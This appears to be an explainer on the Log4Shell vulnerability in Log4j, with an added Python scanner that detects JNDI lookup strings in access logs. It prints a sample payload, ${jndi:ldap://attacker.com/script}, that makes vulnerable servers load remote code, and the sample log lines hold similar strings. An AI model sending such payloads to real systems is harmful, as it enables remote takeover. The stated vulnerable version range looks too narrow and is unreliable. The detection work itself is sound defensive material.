What is Log4j, why is everyone talking about it, and what do you need to do NOW?


What is Log4Shell? Why is it important?

Log4Shell is much easier to explain as a concept than it is to deal with in practice, because the hard part is identifying where this (nearly ubiquitous) library has been used in a given app or service.

At a high level, Log4Shell is a vulnerability in Log4j, a Java library for adding logging capabilities to Java web and desktop applications. It is managed by the Apache Software Foundation, meaning it is included in most of the foundation's software, and the foundation's name carries a "stamp of high-quality code" that most enterprise software developers favor. This vulnerability, which has been appearing in headlines across the news, allows an attacker to remotely take control of a device on the internet if that device is running specific versions of Log4j 2.

The earliest evidence we’ve found so far of the Log4J exploit is 2021-12-01 04:36:50 UTC. This suggests it was in the wild for at least nine days before being publicly disclosed. However, we don’t see evidence of mass exploitation until after public disclosure.

The vulnerability occurs in applications where user input ends up in a log entry. For example, in applications with input fields, users control the text that gets written to the log file. The idea is that an attacker can submit something like: ${jndi:ldap://attacker.com/script}

When the Log4j library writes this entry to a log and parses it, the Java Naming and Directory Interface (JNDI) lookup prefix causes it to connect to the attacker's domain and load and run the code stored there.
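As an added example (not code from the original post), here is a small Python scanner that flags the lookup pattern described above in web-server access-log lines, so a defender can find which requests carried it and which hosts they pointed at. The log lines, IP addresses and host names are constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# A JNDI lookup as Log4j would see it: ${jndi:<scheme>:<rest>}.
# Case-insensitive, since the lookup prefix is matched that way by Log4j.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi:(?P<scheme>[a-z]+):(?P<rest>[^}]*)\}", re.IGNORECASE
)


def find_jndi_lookups(line: str) -> List[Dict[str, Optional[str]]]:
    """Return every ${jndi:...} lookup in one log line, with scheme and host."""
    hits = []
    for m in JNDI_LOOKUP.finditer(line):
        scheme = m.group("scheme").lower()
        rest = m.group("rest")
        # Only URL-shaped lookups (scheme://host/...) carry a remote host.
        host = urlsplit(f"{scheme}:{rest}").hostname if rest.startswith("//") else None
        hits.append({"scheme": scheme, "host": host, "raw": m.group(0)})
    return hits


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Scan access-log lines and report line number, scheme and contacted host."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(lines, start=1):
        for hit in find_jndi_lookups(line):
            findings.append({"line": lineno, **hit})
    return findings


def indicator_hosts(lines: List[str]) -> List[str]:
    """Distinct remote hosts referenced by lookups, for blocklisting or hunting."""
    return sorted({str(f["host"]) for f in scan_log(lines) if f["host"]})


# Constructed sample access-log lines (hypothetical addresses and hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:11:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:11:02:44 +0000] "GET /login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://attacker.example/script}"',
    '203.0.113.9 - - [10/Dec/2021:11:03:01 +0000] "GET /?q=${JNDI:LDAP://203.0.113.50:1389/a} HTTP/1.1" 400 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['scheme']} lookup -> {f['host']}  ({f['raw']})")
```

The lookup can appear in any logged field (here the User-Agent header and the query string), so the scanner searches the whole line rather than one column.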

IT staff at almost all major companies and software providers are now checking their enterprise software for uses of the vulnerable Log4j library.

Anyone running Log4j versions 2.10.0 through 2.14.x is susceptible to attack.

What can you do NOW?

Option 1: Update

The Apache Software Foundation released a security update on Friday, December 10th, 2021, Log4j 2.15.0, which closes this attack vector.

Option 2: Do not update, change the configuration

For companies that can't update yet, setting the log4j2.formatMsgNoLookups option to true in the Log4j configuration also prevents exploitation.
